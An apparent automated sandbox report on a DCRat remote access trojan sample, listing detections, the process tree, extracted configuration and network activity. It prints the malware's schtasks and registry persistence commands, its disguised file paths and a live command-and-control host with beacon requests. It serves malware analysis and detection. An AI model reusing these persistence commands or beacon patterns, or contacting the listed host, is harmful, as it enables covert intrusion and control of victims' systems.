Edit tour

Windows Analysis Report
PMDfwr7Jal.exe

Overview

General Information

Sample name:	PMDfwr7Jal.exe renamed because original name is a hash value
Original sample name:	e1d86c6e52c904e9af8bc1351a66a131.exe
Analysis ID:	1414528
MD5:	e1d86c6e52c904e9af8bc1351a66a131
SHA1:	482741be08bba2ab5e3fd9d181a1dc8539121f8d
SHA256:	ca851ef16c519ecf785610e2db584a5b79f41c76916b28164e580e4fa1238715
Tags:	DCRatexe
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

System process connects to network (likely due to code injection or exploit)

Yara detected DCRat

Creates an autostart registry key pointing to binary in C:\Windows

Creates multiple autostart registry keys

Creates processes via WMI

Drops executable to a common third party application directory

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Dllhost Internet Connection

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious File Created In PerfLogs

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

PMDfwr7Jal.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\PMDfwr7Jal.exe" MD5: E1D86C6E52C904E9AF8BC1351A66A131)

wscript.exe (PID: 7584 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7668 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

perfCrtmonitorsvcMonitorDll.exe (PID: 7720 cmdline: "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe" MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

schtasks.exe (PID: 7772 cmdline: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\ddraw\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7796 cmdline: schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7820 cmdline: schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7844 cmdline: schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\ProgramData\Adobe\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7868 cmdline: schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7896 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\schannel\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7924 cmdline: schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

WmiPrvSE.exe (PID: 7964 cmdline: "C:\Windows\System32\wbem\schannel\WmiPrvSE.exe" MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

dllhost.exe (PID: 8036 cmdline: C:\Windows\System32\ddraw\dllhost.exe MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

ZyNSmFTtlPIEeiJBfofO.exe (PID: 8072 cmdline: "C:\Program Files (x86)\microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe" MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

dllhost.exe (PID: 5516 cmdline: "C:\Windows\System32\ddraw\dllhost.exe" MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

ZyNSmFTtlPIEeiJBfofO.exe (PID: 7424 cmdline: "C:\Program Files (x86)\microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe" MD5: 64B3CA21D783CFB2DDE3FFBAFBF1797F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"TAG": "", "MUTEX": "DCR_MUTEX-T1MjNIJ2enwqXQ7I5jKv", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 1, "ASCFG": null, "AS": false, "ASO": false, "ASP": "%UsersFolder% - Fast", "AK": false, "AD": false}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.1698479357.0000000012991000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000004.00000002.1698479357.0000000012991000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2129f8:$s8: Win32_ComputerSystem 0x212b08:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x212ba6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x212cbc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10e8a0:$cnc4: POST / HTTP/1.1
Process Memory Space: perfCrtmonitorsvcMonitorDll.exe PID: 7720	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: perfCrtmonitorsvcMonitorDll.exe PID: 7720	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x15002a:$s8: Win32_ComputerSystem 0x1500a1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1500ef:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x150179:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xce305:$cnc4: POST / HTTP/1.1

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe, ProcessId: 7720, TargetFilename: C:\Windows\System32\ddraw\dllhost.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PMDfwr7Jal.exe", ParentImage: C:\Users\user\Desktop\PMDfwr7Jal.exe, ParentProcessId: 7536, ParentProcessName: PMDfwr7Jal.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , ProcessId: 7584, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PMDfwr7Jal.exe", ParentImage: C:\Users\user\Desktop\PMDfwr7Jal.exe, ParentProcessId: 7536, ParentProcessName: PMDfwr7Jal.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , ProcessId: 7584, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PMDfwr7Jal.exe", ParentImage: C:\Users\user\Desktop\PMDfwr7Jal.exe, ParentProcessId: 7536, ParentProcessName: PMDfwr7Jal.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , ProcessId: 7584, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\System32\ddraw\dllhost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe, ProcessId: 7720, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost

Sigma detected: Dllhost Internet Connection

Source: Network Connection

Author: bartblaze: Data: DestinationIp: 141.8.197.42, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\ddraw\dllhost.exe, Initiated: true, ProcessId: 5516, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\ddraw\dllhost.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\ddraw\dllhost.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe", ParentImage: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe, ParentProcessId: 7720, ParentProcessName: perfCrtmonitorsvcMonitorDll.exe, ProcessCommandLine: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\ddraw\dllhost.exe'" /rl HIGHEST /f, ProcessId: 7772, ProcessName: schtasks.exe

Sigma detected: Suspicious File Created In PerfLogs

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe, ProcessId: 7720, TargetFilename: C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe", ParentImage: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe, ParentProcessId: 7720, ParentProcessName: perfCrtmonitorsvcMonitorDll.exe, ProcessCommandLine: schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f, ProcessId: 7820, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PMDfwr7Jal.exe", ParentImage: C:\Users\user\Desktop\PMDfwr7Jal.exe, ParentProcessId: 7536, ParentProcessName: PMDfwr7Jal.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe" , ProcessId: 7584, ProcessName: wscript.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\ddraw\dllhost.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\ddraw\dllhost.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe", ParentImage: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe, ParentProcessId: 7720, ParentProcessName: perfCrtmonitorsvcMonitorDll.exe, ProcessCommandLine: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\ddraw\dllhost.exe'" /rl HIGHEST /f, ProcessId: 7772, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PMDfwr7Jal.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\Windows\System32\ddraw\dllhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	Avira: detection malicious, Label: HEUR/AGEN.1323343

Found malware configuration

Source: ZyNSmFTtlPIEeiJBfofO.exe.7424.18.memstrmin

Malware Configuration Extractor: DCRat {"TAG": "", "MUTEX": "DCR_MUTEX-T1MjNIJ2enwqXQ7I5jKv", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 1, "ASCFG": null, "AS": false, "ASO": false, "ASP": "%UsersFolder% - Fast", "AK": false, "AD": false}

Multi AV Scanner detection for dropped file

Source: C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	ReversingLabs: Detection: 80%
Source: C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	Virustotal: Detection: 75%	Perma Link
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	ReversingLabs: Detection: 80%
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Virustotal: Detection: 75%	Perma Link
Source: C:\ProgramData\Adobe\ZyNSmFTtlPIEeiJBfofO.exe	ReversingLabs: Detection: 80%
Source: C:\ProgramData\Adobe\ZyNSmFTtlPIEeiJBfofO.exe	Virustotal: Detection: 75%	Perma Link
Source: C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe	ReversingLabs: Detection: 80%
Source: C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe	Virustotal: Detection: 75%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Virustotal: Detection: 75%	Perma Link
Source: C:\Windows\System32\ddraw\dllhost.exe	ReversingLabs: Detection: 80%
Source: C:\Windows\System32\ddraw\dllhost.exe	Virustotal: Detection: 75%	Perma Link
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	ReversingLabs: Detection: 80%
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Virustotal: Detection: 75%	Perma Link

Multi AV Scanner detection for submitted file

Source: PMDfwr7Jal.exe	ReversingLabs: Detection: 68%
Source: PMDfwr7Jal.exe	Virustotal: Detection: 73%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Joe Sandbox ML: detected
Source: C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	Joe Sandbox ML: detected
Source: C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\ddraw\dllhost.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Joe Sandbox ML: detected
Source: C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	Joe Sandbox ML: detected
Source: C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PMDfwr7Jal.exe

Joe Sandbox ML: detected

Source: PMDfwr7Jal.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PMDfwr7Jal.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PMDfwr7Jal.exe

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0071A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_0071A5F4
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0072B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_0072B8E0

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\ddraw\dllhost.exe

Network Connect: 141.8.197.42 80

Source: Joe Sandbox View	IP Address: 141.8.197.42 141.8.197.42
Source: Joe Sandbox View	IP Address: 141.8.197.42 141.8.197.42

Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1Host: a0583448.xsph.ruConnection: Keep-Alive
